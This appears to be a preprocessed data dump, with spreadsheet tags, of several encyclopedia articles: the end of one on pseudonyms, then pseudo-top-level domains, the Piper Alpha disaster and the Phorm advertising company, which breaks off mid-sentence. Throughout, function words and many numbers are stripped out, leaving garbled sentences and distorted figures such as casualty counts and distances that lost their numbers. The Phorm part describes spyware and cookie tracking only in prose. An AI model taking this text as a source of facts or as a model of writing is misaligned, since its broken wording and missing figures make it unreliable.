alexander hamilton, john jay. papers written partially response several anti-federalist papers, also written pseudonyms. result pseudonymity, historians know papers written madison, hamilton, jay, able discern complete accuracy three authored papers. there also examples modern politicians high-ranking bureaucrats writing pseudonyms.some female authors used male names, particular 19th century, writing male-dominated profession. brontë sisters used names early work, reveal gender (see below) local residents would know books related people neighbourhood. brontës used neighbours inspiration characters many books. anne brontë's tenant wildfell hall (1848) published name acton bell, charlotte brontë used name currer bell jane eyre (1847) shirley (1849), emily brontë adopted ellis bell cover wuthering heights (1847). other examples nineteenth-century novelist mary evans (george eliot) french writer amandine aurore lucile dupin (george sand). pseudonyms also used cultural organization political prejudices. hand, 20th- 21st-century male romance novelists used female names. examples brindle chase, peter o'donnell madeline brent), christopher wood penny sutton rosie dixon), hugh jessica sterling).a name used writer's real name likely confused name another writer notable individual, real name deemed unsuitable. authors write fiction non-fiction, different genres, different names avoid confusing readers. example, romance writer nora roberts writes mystery novels name robb. cases, author become better known name real name. some famous examples include samuel clemens, writing mark twain, theodor geisel, better known seuss. british mathematician charles dodgson wrote fantasy novels lewis carroll mathematical treatises name. some authors, harold robbins, several literary pseudonyms.some names used long periods, even decades, without author's true identity discovered, elena ferrante torsten krol. joanne rowling published harry potter series rowling. rowling also published cormoran strike series, series detective novels including cuckoo's calling pseudonym robert galbraith. winston churchill wrote winston churchill (from full surname spencer churchill otherwise use) attempt avoid confusion american novelist name. attempt wholly successful still sometimes confused booksellers.a name used specifically hide identity author, exposé books espionage crime, explicit erotic fiction. erwin busse used pseudonym published short stories sexually charged encounters germany 1920. some prolific authors adopt pseudonym disguise extent published output, stephen king writing richard bachman. co-authors choose publish collective pseudonym, tracy perri o'shaughnessy. frederic dannay manfred used name ellery queen name collaborative works name main character. earl carter, southern white segregationist affiliated kkk, wrote western books fictional cherokee persona imply legitimacy conceal history."why authors choose pseudonyms? rarely actually hope stay anonymous forever," mused writer columnist russell smith review canadian novel into that fire pseudonymous cates.a famous case french literature romain gary. already well-known writer, started publishing books émile ajar test whether books would well received merits, without established reputation. they were: émile ajar, like romain gary him, awarded prestigious prix goncourt jury unaware person. similarly, actor ronnie barker submitted comedy material name gerald wiley. collective pseudonym represent entire publishing house, contributor long-running series, especially juvenile literature. examples include watty piper, victor appleton, erin hunter, kamiru xhan. another pseudonym literature present story written fictional characters story. series novels known series unfortunate events written daniel handler name lemony snicket, character series. this applies also several 18th-century english american writers used name fidelia. anonymity pseudonym multiple-use name name used many different people protect anonymity. strategy adopted many unconnected radical groups cultural groups, construct personal identity criticised. this idea "open star". medicine pseudonyms acronyms often employed medical research protect subjects' identities process known de-identification. science nicolaus copernicus forward theory heliocentrism manuscript commentariolus anonymously, part employment clerk church-government organization.sophie germain william sealy gosset used pseudonyms publish work field mathematics germain, avoid rampant 19th century academic misogyny, gosset, avoid revealing brewing practices employer, guinness brewery.satoshi nakamoto pseudonym still unknown author authors' group behind white paper bitcoin. military paramilitary organizations ancien régime france, guerre ("war name") would adopted recruit assigned captain company) enlisted french army. these pseudonyms official character predecessor identification numbers: soldiers identified first names, family names, noms guerre jean amarault lafidélité). these pseudonyms usually related soldier's place origin jean deslandes champigny, soldier coming town named champigny), particular physical personal trait antoine bonnet prettaboire, soldier prêt boire, ready drink). 1716, guerre mandatory every soldier; officers adopt noms guerre considered derogatory. daily life, aliases could replace real family name.noms guerre adopted security reasons members world french resistance polish resistance. such pseudonyms often adopted military special-forces soldiers, members similar units resistance fighters, terrorists, guerrillas. this practice hides identities protect families reprisals; also form dissociation domestic life. some well-known adopted noms guerre include carlos, ilich ramírez sánchez; willy brandt, chancellor west germany; subcomandante marcos, spokesman zapatista army national liberation (ezln). during lehi's underground fight british mandatory palestine, organization's commander yitzchak shamir (later prime minister israel) adopted guerre "michael", honour ireland's michael collins. revolutionaries resistance leaders, lenin, stalin, trotsky, golda meir, philippe leclerc hauteclocque, josip broz tito, often adopted noms guerre proper names struggle. george grivas, greek-cypriot eoka militant, adopted guerre digenis (διγενής). french foreign legion, recruits adopt pseudonym break past lives. mercenaries long used "noms guerre", sometimes even multiple identities, depending country, conflict, circumstance. some familiar noms guerre today kunya used islamic mujahideen. these take form teknonym, either literal figurative. online activity individuals using computer online adopt required form pseudonym known "handle" term deriving slang), "user name", "login name", "avatar", sometimes, "screen name", "gamertag", "ign game (nick)name)" "nickname". internet, pseudonymous remailers cryptography achieves persistent pseudonymity, two-way communication achieved, reputations established, without linking physical identities respective pseudonyms. aliasing multiple names data location. more sophisticated cryptographic systems, anonymous digital credentials, enable users communicate pseudonymously identifying means pseudonyms). well-defined abuse cases, designated authority able revoke pseudonyms reveal individuals' real identity.use pseudonyms common among professional esports players, despite fact many professional games played lan.pseudonymity become important phenomenon internet computer networks. computer networks, pseudonyms possess varying degrees anonymity, ranging highly linkable public pseudonyms (the link pseudonym human publicly known easy discover), potentially linkable non-public pseudonyms (the link known system operators publicly disclosed), unlinkable pseudonyms (the link known system operators cannot determined). example, true anonymous remailer enables internet users establish unlinkable pseudonyms; employ non-public pseudonyms (such now-defunct penet remailer) called pseudonymous remailers. continuum unlinkability also seen, part, wikipedia. some registered users make attempt disguise real identities (for example, placing real name user page). pseudonym unregistered users address, can, many cases, easily linked them. other registered users prefer remain anonymous, disclose identifying information. however, certain cases, wikipedia's privacy policy permits system administrators consult server logs determine address, perhaps true name, registered user. possible, theory, create unlinkable wikipedia pseudonym using open proxy, server disguises user's address. open proxy addresses blocked indefinitely frequent vandals. additionally, wikipedia's public record user's interest areas, writing style, argumentative positions still establish identifiable pattern.system operators (sysops) sites offering pseudonymity, wikipedia, likely build unlinkability systems, would render unable obtain information abusive users quickly enough stop vandalism undesirable behaviors. enforcement personnel, fearing avalanche illegal behavior, equally unenthusiastic. still, users privacy activists like american civil liberties union believe internet users deserve stronger pseudonymity protect identity theft, illegal government surveillance, stalking, unwelcome consequences internet (including unintentional disclosures personal information doxing, discussed next section). their views supported laws nations (such canada) guarantee citizens right speak using pseudonym. this right not, however, give citizens right demand publication pseudonymous speech equipment own. confidentiality most sites offer pseudonymity retain information users. these sites often susceptible unauthorized intrusions non-public database systems. example, 2000, welsh teenager obtained information 26,000 credit card accounts, including bill gates. 2003, visa mastercard announced intruders obtained information million credit cards. sites offer pseudonymity also vulnerable confidentiality breaches. study dating service pseudonymous remailer, university cambridge researchers discovered systems used sites protect user data could easily compromised, even pseudonymous channel protected strong encryption. typically, protected pseudonymous channel exists within broader framework multiple vulnerabilities exist. pseudonym users bear mind that, given current state security engineering, true names revealed time. online reputations pseudonymity important component reputation systems found online auction services (such ebay), discussion sites (such slashdot), collaborative knowledge development sites (such wikipedia). pseudonymous user acquired favorable reputation gains trust users. when users believe rewarded acquiring favorable reputation, likely behave accordance site's policies.if users obtain pseudonymous identities freely cost, reputation-based systems vulnerable whitewashing attacks, also called serial pseudonymity, abusive users continuously discard identities acquire ones order escape consequences behavior: internet, nobody knows yesterday dog, therefore doghouse today." users internet communities banned return identities called sock puppets. whitewashing specific form sybil attack distributed systems. social cost cheaply discarded pseudonyms experienced users lose confidence users, subject users abuse establish good reputation. system operators need remind experienced users newcomers well-intentioned (see, example, wikipedia's policy biting newcomers). concerns also expressed sock puppets exhausting supply easily remembered usernames. addition recent research paper demonstrated people behave potentially aggressive manner using pseudonyms/nicknames (due online disinhibition effect) opposed completely anonymous. contrast, research blog comment hosting service disqus found pseudonymous users contributed "highest quantity quality comments", "quality" based aggregate likes, replies, flags, spam reports, comment deletions, found users trusted pseudonyms real names equally. researchers university cambridge showed pseudonymous comments tended substantive engaged users explanations, justifications, chains argument, less likely insults, either fully anonymous real name comments. proposals made raise costs obtaining identities, charging small requiring e-mail confirmation. academic research proposed cryptographic methods pseudonymize social media identities government-issued identities, accrue anonymous reputation online forums, obtain one-per-person hence less readily-discardable pseudonyms periodically physical-world pseudonym parties. others point wikipedia's success attributable large measure nearly non-existent initial participation costs. privacy people seeking privacy often pseudonyms make appointments reservations. those writing advice columns newspapers magazines pseudonyms. steve wozniak used pseudonym attending university california, berkeley co-founding apple computer, "[he] knew [he] time enough student." stage names when used actor, musician, radio disc jockey, model, performer "show business" personality pseudonym called stage name, occasionally, professional name, screen name. film, theatre, related activities members marginalized ethnic religious group often adopted stage names, typically changing surname entire name mask original background. stage names also used create marketable name, case creighton tull chaney, adopted pseudonym chaney, jr., reference famous father chaney, chris curtis deep purple fame christened christopher crummey ("crumby" slang poor quality). similar cases stage name adopted simply avoid unfortunate pun. pseudonyms also used comply rules performing-arts guilds (screen actors guild (sag), writers guild america, east (wga), aftra, etc.), allow performers existing name, order avoid confusion. example, rules required film television actor michael middle initial become michael fox, avoid confused another actor named michael fox. this also true author actress fannie flagg, chose pseudonym; real name, patricia neal, name another well-known actress; british actor stewart granger, whose real name james stewart. film-making team joel ethan coen, instance, share credit editing alias roderick jaynes.some stage names used conceal person's identity, pseudonym alan smithee, used directors directors guild america (dga) remove name film feel edited modified beyond artistic satisfaction. theatre, pseudonyms george georgina spelvin, walter plinge used hide identity performer, usually "doubling" (playing role play). david agnew name used conceal identity scriptwriter, doctor serial city death, three writers, including douglas adams, time writing show's script editor. another doctor serial, brain morbius, writer terrance dicks demanded removal name credits saying could "bland pseudonym". this ended robin bland. music musicians singers pseudonyms allow artists collaborate artists labels avoiding need gain permission labels, artist jerry samuels, made songs napoleon xiv. rock singer-guitarist george harrison, example, played guitar cream's song "badge" using pseudonym. classical music, record companies issued recordings disque 1950s 1960s avoid paying royalties. number popular budget piano music released pseudonym paul procopolis. another example paul mccartney used fictional name "bernerd webb" peter gordon's song woman.pseudonyms used stage names heavy metal bands, tracii guns guns, rose slash guns roses, mick mars mötley crüe, dimebag darrell pantera, c.c. deville poison. some names additional meanings, like brian hugh warner, commonly known marilyn manson: marilyn coming marilyn monroe manson convicted serial killer charles manson. jacoby shaddix papa roach went name "coby dick" infest era. changed back birth name lovehatetragedy released. david johansen, front hard rock band york dolls, recorded performed lounge music pseudonym buster poindexter late 1980s early 1990s. music video poindexter's debut single, hot, opens monologue johansen notes time york dolls explains desire create sophisticated music. ross bagdasarian, sr., creator alvin chipmunks, wrote original songs, arranged, produced records real name, performed david seville. also wrote songs skipper adams. danish pianist bent fabric, whose full name bent fabricius-bjerre, wrote biggest instrumental "alley cat" frank bjorn. time, musician prince used unpronounceable "love symbol" pseudonym ("prince" actual first name rather stage name). wrote song "sugar walls" sheena easton "alexander nevermind" "manic monday" bangles "christopher tracy". also produced albums early career "jamie starr"). many italian-american singers used stage names, birth names difficult pronounce considered ethnic american tastes. singers changing names included dean martin (born dino paul crocetti), connie francis (born concetta franconero), frankie valli (born francesco castelluccio), tony bennett (born anthony benedetto), lady gaga (born stefani germanotta) 2009, british rock band feeder briefly changed name renegades could play whole show featuring list cent songs played forthcoming album name, none singles included. front grant nicholas felt played feeder, would uproar playing singles, used pseudonym hint. series small shows played 2010, 250- 1,000-capacity venues plan band really announce shows band. many cases, hip-hop artists prefer pseudonyms represents variation name, personality, interests. examples include iggy azalea (her stage name combination dog's name, iggy, home street mullumbimby, azalea street), dirty bastard (known least aliases), diddy (previously known various times puffy, diddy, puff daddy), ludacris, rida (whose stage name tribute home state, florida), british-jamaican hip-hop artist stefflon (real name stephanie victoria allen), cool chingy. black metal artists also adopt pseudonyms, usually symbolizing dark values, nocturno culto, gaahl, abbath, silenoz. punk hardcore punk, singers band members often replace real names tougher-sounding stage names vicious (real name john simon ritchie) late 1970s band pistols "rat" early 1980s band varukers 2000s re-formation discharge. punk rock band ramones every member take last name ramone.henry john deutschendorf jr., american singer-songwriter, used stage name john denver. australian country musician born robert lane changed name morton. reginald kenneth dwight legally changed name 1972 elton john. also notes sources peschke, michael. 2006. international encyclopedia pseudonyms. detroit: gale. isbn 978-3-598-24960-0. room, adrian. 2010. dictionary pseudonyms: 13,000 assumed names their origins. rev. jefferson, n.c.: mcfarland isbn 978-0-7864-4373-4. external links site pseudonyms celebrities entertainers archived august 2015 wayback machine another list pseudonyms u.s. copyright status pseudonyms anonymity bibliography excellent bibliography anonymity pseudonymity. includes hyperlinks. anonymity network describes architecture anonymous browsing. electronic frontier foundation (eff) anonymity/pseudonymity archive real name fallacy "not would removing anonymity fail consistently improve online community behavior forcing real names online communities could also increase discrimination worsen harassment." references</t>
  </si>
  <si>
    <t>Pseudo-top-level domain</t>
  </si>
  <si>
    <t>pseudo-top-level domain label name computer network participating world-wide official domain name system even participate internet, similar domain name hierarchy. historically best known large networks group .bitnet, .csnet, .oz, .uucp, many internet mail forwarders provided connectivity. addition, newer networks like .exit, .i2p, included. (newest draft proposal expired july 2015 without becoming standard.) some domains .onion later become officially recognised.although networks domain names official status, generally regarded unofficially grandfathered, unlikely ever allocated top-level domains.pseudo-top-level domains also sometimes used fictitious domain names video games media order prevent practical jokers curious people either bothering websites organizations reaching domains works fiction, registering domain name attempt cybersquatting. also alternative root .local .arpa references</t>
  </si>
  <si>
    <t>Piper Alpha</t>
  </si>
  <si>
    <t>piper alpha platform located north approximately miles (190 north-east aberdeen, scotland. operated occidental petroleum (caledonia) limited began production 1976, initially oil-only platform later converted production. piper alpha exploded sank july 1988, killing board, thirty whose bodies never recovered, well rescue workers rescue vessel, trapped debris immobilized, destroyed disintegrating rig. sixty-one workers escaped survived. total insured loss £1.7 billion, making costliest man-made catastrophes ever. time disaster, platform accounted approximately north production. accident world's worst offshore disaster terms lives lost industry impact.in aberdeen, kirk nicholas union street dedicated chapel memory died, containing book remembrance listing them. there memorial sculpture rose garden hazlehead park. piper oilfield four companies later became opcal joint venture obtained exploration licence 1972. they discovered piper oilfield located 58°28′n 0°15′e early 1973 began fabrication platform, pipelines onshore support structures. production started 1976 250,000 barrels (40,000 day, increasing 300,000 barrels (48,000 m3). recovery module installed 1980. production declined 125,000 barrels (19,900 1988. opcal built flotta terminal orkney islands receive process piper, claymore, tartan oilfields, platform. 30-inch diameter main pipeline miles (206 piper alpha flotta, short pipeline claymore platform joining miles west. tartan field also claymore field onto main line flotta. separate 18-inch diameter pipelines tartan platform piper, piper compressing platform mcp-01 miles northwest. construction large fixed platform, piper alpha atop piper oilfield, approximately miles (190 north east aberdeen feet (144 water. built four modules separated firewalls.the platform constructed mcdermott engineering ardersier union industrielle d'entreprise cherbourg, sections united ardersier 1975, production commencing late 1976. safety reasons modules organised dangerous platform operations took place personnel areas. conversion broke safety concept, result sensitive areas brought together; example, compression next control room. close position areas played role accident. piper alpha produced crude natural wells delivery flotta terminal orkney installations three separate pipelines. time disaster, piper heaviest platforms operating north sea, along magnus brae construction upgrades maintenance background 1978, major works carried enable platform meet government conservation requirements, avoid waste flaring excess gas. after work completed, piper alpha operating known "phase mode" (operating conservation module (gcm)). from 1980 july 1988 phase mode normal operating state. late 1980s, major construction, maintenance, upgrade works planned occidental july 1988, already well major reconstruction, major projects identified, including change-out unit. this meant returned initial phase mode (i.e., operating without unit). despite complex demanding work schedule, occidental made decision continue operating platform phase mode throughout period shut down, originally planned. planning controls place thought adequate. therefore, piper continued export 120,000 barrels (19,000 export tartan million cubic feet (930 thousand cubic metres) standard conditions period. because platform completely destroyed, many involved died, analysis events suggest possible chain events based known facts. some witnesses events question official timeline. timeline events preliminary events 12:00, july 1988: condensate pumps, designated operating displace platform's condensate transport coast. morning july, pump pressure safety valve (psv #504) removed routine maintenance. pump's two-yearly overhaul planned started. open condensate pipe temporarily sealed disk cover (flat metal disc also called blind flange blank flange). because work could completed 18:00, disc cover remained place. hand-tightened only. on-duty engineer filled permit stated pump ready must switched circumstances. 18:00: shift ended, night shift started running piper alpha. on-duty custodian busy, engineer neglected inform condition pump instead placed permit control centre left. this permit disappeared found. coincidentally another permit issued general overhaul pump begun. 19:00: fire-fighting system manual control: like many offshore platforms, piper alpha automatic fire-fighting system, driven diesel electric pumps (the latter disabled initial explosions). diesel pumps designed suck large amounts water fire fighting; pumps automatic controls start case fire case could started remotely/manually control room near centre explosion evacuated). however, fire-fighting system manual control evening july: piper alpha procedure adopted offshore installation manager (oim) required manual control pumps whenever divers water approximately twelve hours summer) although reality, risk seen significant divers unless diver closer 10–15 feet (3–5 four feet level caged intakes. recommendation earlier audit suggested procedure developed keep pumps automatic mode divers working vicinity intakes practice claymore platform, never implemented. 21:45: pump tripped could restarted: because problems methanol system earlier day, methane clathrate flammable ice) started accumulate compression system pipework, causing blockage. blockage, condensate (natural liquids ngl) pump stopped could restarted. entire power supply offshore construction work depended pump, manager minutes bring pump back online, otherwise power supply would fail completely. search made documents determine whether condensate pump could started. 21:52: permit pump recertification found pump restarted: permit overhaul found, permit stating pump must started circumstances missing safety valve. valve different location pump therefore permits stored different boxes, sorted location. none present aware vital part machine removed. manager assumed existing documents would safe start pump missing valve noticed anyone, particularly metal disc replacing safety valve several metres ground level obscured machinery. first explosion initial reactions 21:55, first explosion condensate leak flange: condensate pump switched flowed pump, missing safety valve, produced overpressure loosely fitted metal disc withstand. audibly leaked high pressure, drawing attention several triggering alarms including high level alarm. before anyone could act, ignited exploded, blowing firewall made panels bolted together, designed withstand explosions. custodian geoff bollands activated rig's emergency stop button, closing huge valves lines ceasing extraction.theoretically, platform would isolated flow fire contained. however, platform originally built oil, firewalls designed resist fire rather withstand explosions. first explosion broke firewall dislodged panels around module (b). flying panels ruptured small condensate pipe, creating another fire.22:04: control room piper alpha abandoned. mayday call signalled radio radio operator david kinrade. piper alpha's design made allowances destruction control room, platform's organisation disintegrated. attempt made loudspeakers order evacuation. despite bollands' activation emergency stop, alarms warning workers unfolding disaster, much systems destroyed initial blast. 22:05: search rescue station lossiemouth received first call notifying possibility emergency, king helicopter, "rescue 138", took request coastguard station aberdeen. station boulmer also notified, hawker siddeley nimrod maritime patrol aircraft kinloss sent area "on-scene commander" using designation "rescue zero-one". 22:06: crude storage tanks module unable withstand combined pressure contents heat flames; they rupture flood area crude oil, ignites almost instantaneously, creating black plume smoke characteristic fires, seen photographs nearby ships. burning later drips onto lower platform used diving operations. platform floor consisted steel grates normal circumstances would allowed burning drip harmlessly sea, divers previous shift placed rubber matting metal grate (apparently cushion bare feet relatively sharp metal), allowing form burning puddle platform. subsequent explosions 22:20: heat burning collecting diving platform causes nearby tartan pipeline, pressurized atmospheres, rupture violently, releasing 15-30 tonnes (10,000 30,000 (350,000 1,060,000 highly flammable contents immense pressure every second, immediately ignited massive fireball, heat vibrations felt away kilometre. from moment platform's destruction inevitable. 22:30: tharos, large semi-submersible fire fighting, diving rescue accommodation vessel, drew alongside piper alpha. tharos used water cannon could, restricted, cannon powerful would injure kill anyone water. tharos equipped hospital offshore medic assisted diver paramedics tharos saturation diving team. triage reception area vessel's helideck receive injured casualties. 22:50: mcp-01 pipeline fails explodes, shooting huge flames air. tharos driven heat, began melt surrounding machinery steelwork. explosion claymore platform stopped pumping oil. personnel still left alive either desperately sheltering scorched, smoke-filled accommodation block leaping various deck levels, including helideck, north sea. explosion destroys fast rescue boat launched standby vessel sandhaven trapped debris rescue attempt, killing crewmen board, well piper alpha survivors rescued water. sandhaven standby vessel santa 135, several miles away. 23:18: claymore line ruptures explodes, adding even fuel already massive firestorm board piper alpha. with thousands cubic metres highly volatile fuel burning every second, 20,000-tonne steel platform melted next minutes. rescue crews arrive platform collapses 23:35: helicopter "rescue 138" lossiemouth arrives scene. 23:37: tharos contacts nimrod "rescue zero-one" apprise situation. standby vessel picked casualties, including three serious burns, another injury. tharos requests evacuation non-essential personnel make room incoming casualties. "rescue 138" requested evacuate non-essential personnel tharos transfer ocean victory, returning paramedics. 23:50: with critical support structures burned away, nothing support heavier structures top, platform began collapse. cranes collapsed, followed drilling derrick. generation utilities module (d), included fireproofed accommodation block, still occupied crewmen sheltered there, slipped sea. largest part platform followed "rescue 138" lands tharos picks non-essential personnel, leaving ocean victory. 23:55: "rescue 138" arrives ocean victory deposits passengers returning tharos four ocean victory's paramedics. 00:07, july: "rescue 138" lands paramedics ocean victory. 00:17: "rescue 138" winches serious burns casualties picked standby safety vessel, silver pit. 00:25: first seriously-injured survivor piper alpha winched aboard "rescue 138". 00:45: entire platform gone. module remained piper alpha. 00:48: "rescue 138" lands tharos three casualties picked silver pit. 00:58: civilian sikorsky s-61 helicopter bristow helicopters arrives tharos aberdeen medical emergency team. 01:47: coastguard helicopter lands tharos casualties. 02:25: first helicopter leaves tharos casualties aberdeen royal infirmary. 03:27: "rescue 138" lands tharos bodies fatalities. "rescue 138" leaves refuel drilling santa 135. 05:15: "rescue 137" arrives tharos, lands, leaves taking casualties aberdeen. 06:21: uninjured survivors piper alpha leave tharos civilian s-61 helicopter aberdeen. 07:25: "rescue 138" picks remaining survivors tharos transfer aberdeen. casualties time disaster people platform; died survived. sandhaven, standby vessel nearby santa 135, also killed. standby vessel piper alpha silver pit, co-incidence also standby vessel ekofisk field alexander kielland capsized march 1980. aftermath there controversy whether sufficient time effective emergency evacuation. first explosion killed personnel authority order evacuation destroyed control room, much control systems room responsible sounding platform-wide alarms also lost destruction. this consequence platform design, include blast walls. another contributing factor nearby connected platforms tartan claymore continued pump piper alpha pipeline ruptured heat second explosion. their operations crews believe authority shut production, even though could piper alpha burning.the nearby diving support vessel lowland cavalier reported initial explosion 22:00, second explosion occurred minutes later. time civil military rescue helicopters reached scene, flames metres height visible away (120 maersk highlander) away prevented safe approach. largest number survivors recovered fast rescue boat standby safety vessel, silver pit; coxswain james clark later received george medal. others awarded george medal charles haffey methil, andrew kiloh aberdeen, james mcneill oban.the blazing remains platform eventually extinguished three weeks later team onboard tharos firefighter adair, despite reported conditions (130 km/h) winds 70-foot waves. part platform contained galley victims taken refuge recovered divers late 1988 bed, bodies found inside. inquiry safety recommendations cullen inquiry november 1988 establish cause disaster. chaired scottish judge william cullen. after days proceedings, released report public inquiry piper alpha disaster (short: cullen report) november 1990. concluded initial condensate leak result maintenance work carried simultaneously pump related safety valve. inquiry critical piper alpha's operator, occidental, found guilty inadequate maintenance safety procedures, criminal charges ever brought company.the second part report made recommendations changes north safety procedures: recommendations covered procedures operating equipment, information platform personnel, design platforms information emergency services responsibility implement regulator, operators, industry whole stand-by ship owners.the recommendations enactment offshore safety 1992 making offshore installations (safety case) regulations 1992.most significant recommendations operators required present safety case responsibility enforcing safety north moved department energy health safety executive, production safety overseen agency conflict interest.in 2013, 25th anniversary disaster, video remembering piper night that changed lives released step change safety. three-day conference held aberdeen reflect lessons learned piper alpha industry safety issues general. insurance claims disaster insurance claims around us$1.4 billion, making time largest insured man-made catastrophe. insurance reinsurance claims process revealed serious weaknesses insurers lloyd's london elsewhere kept track potential exposures, procedures reformed. legacy survivors relatives died went form piper alpha families survivors' association, campaigns north safety issues. wreck buoy marking remains piper approximately nautical miles replacement piper bravo platform. lasting effect piper alpha disaster establishment britain's first "post-margaret thatcher" trade union, offshore industry liaison committee. beginning 1998, month tenth anniversary, professor david alexander, director aberdeen centre trauma research robert gordon university carried study long-term psychological social effects piper alpha. managed find survivors agreed give interviews complete questionnaires. almost group reported psychological problems. more interviewed reported psychological behavioural symptoms post traumatic stress disorder. twenty-eight said difficulty finding employment following disaster; appears offshore employers regarded piper alpha survivors "jonahs" bringers luck, would welcome rigs platforms. family members dead surviving victims also reported various psychological social problems. alexander also wrote "some lads stronger piper. they've learned things themselves, changed values, relationships became stronger. people realised strengths know had. there heroism took place." memorials july 1991, third anniversary disaster, memorial sculpture showing three workers erected rose garden within hazlehead park aberdeen. figures represent west physical nature offshore trades, east youth eternal movement north holds unwinding spiral represents left hand. sculptor jane taylor, scottish artist visited piper platform previous year, based much work around around industry. survivors used model figures. 1991, scottish composer james macmillan wrote "tuireadh", piece clarinet string quartet, musical complement memorial sculpture. 2008, mark 20th anniversary disaster, stage play, lest forget commissioned aberdeen performing arts written playwright mike gibb. performed aberdeen week leading anniversary final performance july 2008, 20th anniversary. media incident featured 1990 documentary television series rescue, search rescue force lossiemouth, episode "piper alpha". coincidentally, film crew documenting rescue teams lossiemouth time piper alpha accident. july 2008, radio broadcast 90-minute play entitled piper alpha. based actual evidence given cullen inquiry, events night retold twenty years minute happened. national geographic featured incident seconds from disaster documentary episode explosion north sea. 2013 documentary film fire night disaster. made berriff mcginty films co-produced stv. producer cameraman paul berriff king r137 filming search rescue activities scottish highlands television series, able accompany helicopter piper alpha disaster, filming events happened.in 2018, disaster featured history documentary series james nesbitt's disasters that changed britain. testimonials heard survivors relatives victims. also fire blast information group references lord cullen (november 1990). public enquiry piper alpha disaster 1310) (report). london: majesty's stationery office. isbn 0-10-113102-x. caplan. "appendix opinions (lord caplan) 560-739 0/1261/5/1990". retrieved december 2005. caplan. "appendix opinions (lord caplan) volume chapter causation retrieved december 2005. external links resources united kingdom volume 1998 publication (2005 archive) this news article july 1988) piper alpha disaster education scotland website (2013 archive)</t>
  </si>
  <si>
    <t>Phorm</t>
  </si>
  <si>
    <t>phorm, formerly known 121media, digital technology company known contextual advertising software. phorm incorporated delaware, united states, relocated singapore phorm corporation (singapore) 2012. founded 2002, company originally distributed programs considered spyware, made millions dollars revenue. stopped distributing programs complaints groups united states canada, announced talking several united kingdom internet service providers (isps) deliver targeted advertising based websites users visited. phorm partnered isps telefonica brazil, romtelecom romania, ttnet turkey. june 2012, phorm made unsuccessful attempt raise million stake chinese subsidiary.the company's proposed advertising system, called webwise, behavioral targeting service (similar nebuad) used deep packet inspection examine traffic. phorm said data collected would anonymous would used identify users, service would include protection phishing (fraudulent collection users' personal information). nonetheless, world wide creator berners-lee others spoke phorm tracking users' browsing habits, group criticised running secret trials service. information commissioner's office voiced legal concerns webwise, said would legal "opt-in" service, opt-out system. european commission called protect users' privacy, opened infringement proceeding country regard isps' phorm. some groups, including amazon.com wikimedia foundation (the non-profit organization operates collaborative wiki projects), requested opt-out websites scans system. phorm changed opt-in policy. according phorm’s website, company would collect data users explicitly opted services. users provide separate consent browsing device used.due increasing issues, phorm ceased trading april 2016. company history previous incarnation 121media, company made products described spyware register. 121media distributed program called peopleonpage, classified spyware f-secure. peopleonpage application built around advertising engine, called contextplus. contextplus also distributed rootkit called apropos, used tricks prevent user removing application sent information back central servers regarding user's browsing habits.the center democracy technology, u.s.-based advocacy group, filed complaint u.s. federal trade commission november 2005 distribution considered spyware, including contextplus. they stated investigated uncovered deceptive unfair behaviour. this complaint filed concert canadian internet policy public internet center, group filing similar complaint integrated search technologies canadian authorities.contextplus shut operations 2006 stated longer able ensure highest standards quality customer care". shutdown came several major lawsuits adware vendors launched. september 2007, 121media become known phorm, admitted company history adware stated closed multimillion-dollar revenue stream peopleonpage toolbar, citing consumers’ identification adware spyware primary cause decision.in early 2008 phorm admitted editing article wikipedia—removing quotation guardian's commercial executives describing opposition towards tracking system, deleting passage explaining admitted misleading customers covert phorm trials 2007. changes quickly noticed reversed online encyclopedia's editors.phorm currently resides mortimer street, london, staffing levels around trading phorm's shares suspended london's market february 2016, pending "clarification company's financial position". according phorm, "unable secure requisite equity funding..." "advanced discussions certain shareholders parties regarding possible alternative financing..." guarantee" discussions would "result funds raised. pending conclusion discussions company requested suspension shares trading aim." financial losses company made loss $32.1 million 2007, loss $49.8 million 2008 loss $29.7 million 2009. 2010 means better, loss $27.9 million 2010 company lost $107 million, perceivable revenue stream. 2011, phorm reported losses $30.5 million conducted equity placing £33.6 million, paid company's debt. cessation trading april 2016 phorm's board directors announced london stock exchange company ceasing trade shareholders unlikely recover investments.according number 2561y ftse 2016. changes ftse index series ftse all-share index effective from start trading 2016 phorm (uk): constituent deletion. proposed advertisement service phorm worked major u.s. british isps—including group (formerly british telecom), virgin media, talktalk time owned carphone warehouse)—on behavioral targeting advertisement service monitor browsing habits serve relevant advertisements user. phorm deals would given access surfing habits british households broadband. service, uses deep packet inspection check content requested pages, compared nebuad front porch.the service, would marketed end-users "webwise", 2009 took legal advice trade mark webwise), would work categorising user interests matching advertisers wish target type user. browse we're able categorise internet actions", said phorm virasb vahidi. actually entire internet". company said data collected would completely anonymous phorm would never aware identity user browsed, adds phorm's advertising categories exclude sensitive terms widely drawn reveal identity user. monitoring users' browsing, phorm even says able offer protection online fraud phishing.phorm formerly maintained opt-out policy services. however, according spokesman phorm, opt-out works means contents websites visited still mirrored system. computers, users, http applications used user computer need configured supplemented ons) out. since declared information commissioner's office phorm would legal opt-in service. implementation richard clayton, cambridge university security researcher, attended on-the-record meeting phorm, published account advertising system implemented.phorm's system, like many websites, uses http cookies (small pieces text) store user settings. company said initial request redirected three times (using http responses) within system, inspect cookies determine user opted out. system sets unique phorm tracking identifier (uid) user collects already exists), adds cookie forged appear come requested website.in analysis titled "stealing phorm cookies", clayton wrote phorm's system stores tracking cookie website visited user's contains identical copy user's uid. where possible, phorm's system strips tracking cookies http requests forwarded across internet website's server, cannot prevent sent websites using https. this would allow websites associate details website collects visitor.phorm senior vice president technology marc burgess said collected information also includes timestamp. burgess said, "this enough information accurately target [the] future, cannot used find are, browsed". incentives 2008 phorm considered offering incentive, addition phishing protection originally planned, means convince end-users webwise system. alternate incentives, suggested toluna.com market research survey carried behalf phorm, included phishing protection, donation charity, free technical support line, pound opted-in users' monthly broadband subscriptions.following decision wikimedia foundation amazon websites profiled phorm's webwise system, incentive websites remain opted phorm profiling system, phorm launched webwise discover. korean launch publisher incentive announced press conference covent garden london june 2009. survey polling firm populus revealed watching demonstration video, 2,075 individuals polled claimed either like idea like .website publishers invited upload widget provide small frame display recommended links, based tracked interests phorm-tracked website visitors (those whose uses phorm deep packet inspection intercept profile traffic). there would charge website, phorm stand make money webwise discover; however, plans display targeted adverts future.[1] widget would deliver link recommendations user signed targeted advertising phorm-affiliated isp, widget would invisible everyone else.. press launch phorm spokespersons admitted present single website signed webwise discover system, although emphasised part current korea telecom webwise trials. legal advice offered websites considering signing system susan singleton.[4] legality open rights group (org) raised questions phorm's legality asked clarification service would work. fipr argued phorm's online advert system illegal nicholas bohm, general counsel fipr, said: "the need 